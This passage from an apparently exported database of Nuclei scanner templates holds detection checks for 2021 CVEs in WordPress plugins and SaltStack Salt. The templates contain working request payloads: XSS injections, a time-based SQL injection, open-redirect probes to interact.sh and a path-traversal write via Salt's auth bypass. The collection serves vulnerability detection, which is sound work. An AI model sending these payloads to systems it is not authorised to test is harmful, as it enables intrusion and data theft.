"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082ef" }, "name": "CVE-2021-25074.yaml", "content": "id: CVE-2021-25074\n\ninfo:\n name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect\n author: dhiyaneshDk\n severity: medium\n description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.\n impact: |\n An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.\n remediation: |\n Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed.\n reference:\n - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25074\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25074\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: webp_converter_for_media_project\n product: webp_converter_for_media\n framework: wordpress\n tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100b07e30b60813be07ad6a2b28ad020bb7afc7e921992d672cc8cfd26e37ccddd502203e41c21853075160cd1331bf8021e9aa97b5a5a9987ea23114fc44e42121ed46:922c64590222798bb761d5b6d8e72950", "hash": "cd880c92c39cc6d295b57402daa89a4c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f0" }, "name": "CVE-2021-25075.yaml", "content": "id: CVE-2021-25075\n\ninfo:\n name: WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting\n author: DhiyaneshDK\n severity: low\n description: |\n WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.5.1.\n reference:\n - https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25075\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/kazet/wpgarlic\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N\n cvss-score: 3.5\n cve-id: CVE-2021-25075\n cwe-id: CWE-862\n epss-score: 0.00071\n epss-percentile: 0.28959\n cpe: cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: wpdevart\n product: duplicate_page_or_post\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p\n - |\n GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"style=animation-name:rotation onanimationstart=alert(/XSS/) p\"\n - \"toplevel_page_wpda_duplicate_post_menu\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c669b18178ca28119ca6a8bfc6992e205f34d74494ea204e90aafd87ca6506710221009983c4a067b30c7584b1b513ed5c3e345e4900e97b7e9bc61e0e54a2b0072bbc:922c64590222798bb761d5b6d8e72950", "hash": "6c275f5959694641484450a0029866c5", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f1" }, "name": "CVE-2021-25078.yaml", "content": "id: CVE-2021-25078\n\ninfo:\n name: Affiliates Manager < 2.9.0 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of an authenticated user, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 2.9.0\n reference:\n - https://wpscan.com/vulnerability/d4edb5f2-aa1b-4e2d-abb4-76c46def6c6e\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25078\n - https://plugins.trac.wordpress.org/changeset/2648196\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25078\n cwe-id: CWE-79\n epss-score: 0.00382\n epss-percentile: 0.72505\n cpe: cpe:2.3:a:wpaffiliatemanager:affiliates_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: wpaffiliatemanager\n product: affiliates_manager\n framework: wordpress\n tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /?wpam_id=1 HTTP/1.1\n Host: {{Hostname}}\n X-Forwarded-For: \n - |\n GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200 && status_code_3 == 200'\n - 'contains(header_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"Affiliates Manager Click Tracking\")'\n condition: and\n# digest: 4a0a00473045022100d45c069f29a544929998b412cdaf7084396f20aae8cff0f93ca75a1b591460d202201e599ffe4698dda85884b6e16ba5a83ac94b79c1a3ef46490718bf36107cfa50:922c64590222798bb761d5b6d8e72950", "hash": "7f3dc882ebad6c55aae084ef03898d23", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f2" }, "name": "CVE-2021-25079.yaml", "content": "id: CVE-2021-25079\n\ninfo:\n name: Contact Form Entries < 1.2.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape various parameters, such as form_id, status, end_date, order, orderby and search before outputting them back in the admin page\n remediation: Fixed in version 1.1.7\n reference:\n - https://wpscan.com/vulnerability/c3d49271-9656-4428-8357-0d1d77b7fc63\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25079\n - https://wordpress.org/plugins/contact-form-entries/\n - https://plugins.trac.wordpress.org/changeset/2629442\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25079\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40882\n cpe: cpe:2.3:a:crmperks:contact_form_entries:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: crmperks\n product: contact_form_entries\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/contact-form-entries/\"\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,authenticated,contact-form-entries,xss,crmperks\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Ez2u4g HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - \"contains(body_2, '') && contains(body_2, 'contact-form')\"\n condition: and\n# digest: 490a004630440220527cd48e142fc92a896aa9a399aaec530758544a07344bf510df911351b0108c022051f1ca942de9836a377cb44c7a038c6f2b740ecceeb66faca7d10b4a7e7f7585:922c64590222798bb761d5b6d8e72950", "hash": "e1e1ab7f43d702476038a7eb295ec293", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f3" }, "name": "CVE-2021-25085.yaml", "content": "id: CVE-2021-25085\n\ninfo:\n name: WOOF WordPress plugin - Cross-Site Scripting\n author: Maximus Decimus\n severity: medium\n description: |\n The WOOF WordPress plugin does not sanitize or escape the woof_redraw_elements parameter before reflecting it back in an admin page, leading to a reflected cross-site scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the WOOF WordPress plugin, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/b7dd81c6-6af1-4976-b928-421ca69bfa90\n - https://plugins.trac.wordpress.org/changeset/2648751\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25085\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25085\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:pluginus:woocommerce_products_filter:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: pluginus\n product: woocommerce_products_filter\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,wp,xss,wpscan,pluginus\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"additional_fields\":[\"\"]}'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f9908167df17fe760df5f1a19699d139a5efbb37c3dedd65ffedf9f786c4860002210085485a2e0ded0fe926fbaeb985991879d0ca1ff02fb398695df4569d41ac1248:922c64590222798bb761d5b6d8e72950", "hash": "61b22a675bb7d9b1f94833fe4da70e7e", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f4" }, "name": "CVE-2021-25099.yaml", "content": "id: CVE-2021-25099\n\ninfo:\n name: WordPress GiveWP <2.17.3 - Cross-Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f\n - https://wordpress.org/plugins/give/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25099\n - https://plugins.trac.wordpress.org/changeset/2659032\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25099\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: givewp\n product: givewp\n framework: wordpress\n tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=give_checkout_login&form_id=xxxxxx\">\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\")'\n - 'contains(body, \"give_user_login\")'\n condition: and\n# digest: 4a0a00473045022100b8b1bbb738779094f1c4803577aabec032f44d2bd14d740c5bc4dc129660ed1c0220446b58a14acbdfe6216958668bbfe39c82d48cc2aa45a2dd0645799000150e26:922c64590222798bb761d5b6d8e72950", "hash": "9ceca683b2fe65adc168e4a7670fc556", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f5" }, "name": "CVE-2021-25104.yaml", "content": "id: CVE-2021-25104\n\ninfo:\n name: WordPress Ocean Extra <1.9.5 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 1.9.5.\n reference:\n - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558\n - https://wordpress.org/plugins/ocean-extra/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25104\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25104\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: oceanwp\n product: ocean_extra\n framework: wordpress\n tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/?step=demo&page=owp_setup&a\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'OceanWP'\n - '>'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e3443b56e8a05c597dc43a2aa8eb67debf30c8d4ae911a0a37658bb837881d2702200e78e6b22e247af5d76f5db33eb488b26dac3e21e943f38a4d4baa45bceb3afd:922c64590222798bb761d5b6d8e72950", "hash": "fada20df23d887b484cf10079a0b9303", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f6" }, "name": "CVE-2021-25111.yaml", "content": "id: CVE-2021-25111\n\ninfo:\n name: WordPress English Admin <1.5.2 - Open Redirect\n author: akincibor\n severity: medium\n description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of other malicious activities.\n remediation: |\n Update to the latest version of the WordPress English Admin plugin (1.5.2 or higher) to fix the open redirect vulnerability.\n reference:\n - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25111\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25111\n cwe-id: CWE-601\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: english_wordpress_admin_project\n product: english_wordpress_admin\n framework: wordpress\n tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950", "hash": "a215f90c09aac1ef88392528e36617e9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f7" }, "name": "CVE-2021-25112.yaml", "content": "id: CVE-2021-25112\n\ninfo:\n name: WordPress WHMCS Bridge <6.4b - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: |\n WordPress WHMCS Bridge plugin before 6.4b contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the error parameter before outputting it back in the admin dashboard.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress WHMCS Bridge to version 6.4b or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c\n - https://plugins.trac.wordpress.org/changeset/2659751\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25112\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25112\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:i-plugins:whmcs_bridge:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: i-plugins\n product: whmcs_bridge\n framework: wordpress\n tags: cve2021,cve,whmcs,xss,wpscan,wordpress,wp-plugin,wp,authenticated,i-plugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a2b074c829e8dc42c189432313efffb7f9da5318f55e319d2755d73408c87795022100dde60a50bcc04205df2039566063b015b72bcc70051c9a54a9c087c20daa5599:922c64590222798bb761d5b6d8e72950", "hash": "afd76173977e5d18b644c37c3bd46cba", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f8" }, "name": "CVE-2021-25114.yaml", "content": "id: CVE-2021-25114\n\ninfo:\n name: WordPress Paid Memberships Pro <2.6.7 - Blind SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Paid Memberships Pro plugin before 2.6.7 is susceptible to blind SQL injection. The plugin does not escape the discount_code in one of its REST routes before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to WordPress Paid Memberships Pro version 2.6.7 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6c25a5f0-a137-4ea5-9422-8ae393d7b76b\n - https://wordpress.org/plugins/paid-memberships-pro/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25114\n - https://www.paidmembershipspro.com/pmpro-update-2-6-7-security-release/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-25114\n cwe-id: CWE-89\n epss-score: 0.0412\n epss-percentile: 0.91962\n cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: strangerstudios\n product: paid_memberships_pro\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/paid-memberships-pro\"\n tags: cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /?rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - duration_1>=6\n - contains(header_1, \"application/json\")\n - status_code == 200\n - contains(body_2, 'other_discount_code_')\n condition: and\n# digest: 490a0046304402205779f4688b602f810729763c28227697e17fbe54eabdf2769e00c3efd62634dc0220099aece2ea83884ee11dd109d206c253835129f29b3ea2922f55c13bbcce1686:922c64590222798bb761d5b6d8e72950", "hash": "d352f64e2655c763d414c5c1a46971f8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082f9" }, "name": "CVE-2021-25118.yaml", "content": "id: CVE-2021-25118\n\ninfo:\n name: Yoast SEO 16.7-17.2 - Information Disclosure\n author: DhiyaneshDK\n severity: medium\n description: Yoast SEO plugin 16.7 to 17.2 is susceptible to information disclosure, The plugin discloses the full internal path of featured images in posts via the wp/v2/posts REST endpoints, which can help an attacker identify other vulnerabilities or help during the exploitation of other identified vulnerabilities.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the target system.\n remediation: Fixed in version 17.3.\n reference:\n - https://wpscan.com/vulnerability/2c3f9038-632d-40ef-a099-6ea202efb550\n - https://plugins.trac.wordpress.org/changeset/2608691\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25118\n - https://github.com/20142995/sectool\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-25118\n cwe-id: CWE-200\n epss-score: 0.00173\n epss-percentile: 0.5348\n cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: yoast\n product: yoast_seo\n framework: wordpress\n tags: cve2021,cve,wpscan,wordpress,wp-plugin,fpd,wp,yoast\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/posts?per_page=1\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n regex:\n - '\"path\":\"(.*)/wp-content\\\\(.*)\",\"size'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '\"path\":\"(.*)/wp-content\\\\(.*)\",\"size'\n part: body\n# digest: 4a0a00473045022100ba7a661218a1675b4be3d3970f6130b049f1a01cdf39b787b6305b14f5d7890302206dac7b754b0ebb88e2061818cbef0180bf4b74b44844829f6821143b16255802:922c64590222798bb761d5b6d8e72950", "hash": "55ec77675e03a1df0628363677fc0333", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fa" }, "name": "CVE-2021-25120.yaml", "content": "id: CVE-2021-25120\n\ninfo:\n name: Easy Social Feed < 6.2.7 - Cross-Site Scripting\n author: dhiyaneshDk\n severity: medium\n description: Easy Social Feed < 6.2.7 is susceptible to reflected cross-site scripting because the plugin does not sanitize and escape a parameter before outputting it back in an admin dashboard page, leading to it being executed in the context of a logged admin or editor.\n remediation: |\n Update to Easy Social Feed version 6.2.7 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0\n - https://wpscan.com/vulnerability/0ad020b5-0d16-4521-8ea7-39cd206ab9f6\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25120\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-25120\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:easysocialfeed:easy_social_feed:*:*:*:*:pro:wordpress:*:*\n metadata:\n max-request: 2\n vendor: easysocialfeed\n product: easy_social_feed\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,xss,authenticated,wpscan,easysocialfeed\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type= HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'type' : ''\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100f3ce163f0a4245b48fadd091ce77fffda6474552e66006405db188add5f1336702210088a04491ecf1ec03bde9a145ed885d03c432c745e0df7266f322e4320502f4dd:922c64590222798bb761d5b6d8e72950", "hash": "bb3588d77de2a65fb4e7985613ab416a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082fb" }, "name": "CVE-2021-25281.yaml", "content": "id: CVE-2021-25281\n\ninfo:\n name: SaltStack Salt <3002.5 - Auth Bypass\n author: madrobot\n severity: critical\n description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master.\n remediation: |\n Upgrade to SaltStack Salt version 3002.5 or later to mitigate this vulnerability.\n reference:\n - http://hackdig.com/02/hack-283902.htm\n - https://dozer.nz/posts/saltapi-vulns\n - https://nvd.nist.gov/vuln/detail/CVE-2021-25281\n - https://github.com/saltstack/salt/releases\n - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-25281\n cwe-id: CWE-287\n epss-score: 0.87406\n epss-percentile: 0.98556\n cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: saltstack\n product: \"salt\"\n tags: cve,cve2021,saltapi,rce,saltstack,unauth\n\nhttp:\n - raw:\n - |\n POST /run HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"client\":\"wheel_async\",\"fun\":\"pillar_roots.write\",\"data\":\"testing\",\"path\":\"../../../../../../../tmp/testing\",\"username\":\"1\",\"password\":\"1\",\"eauth\":\"pam\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"return\"\n - \"tag\"\n - \"jid\"\n - \"salt\"\n - 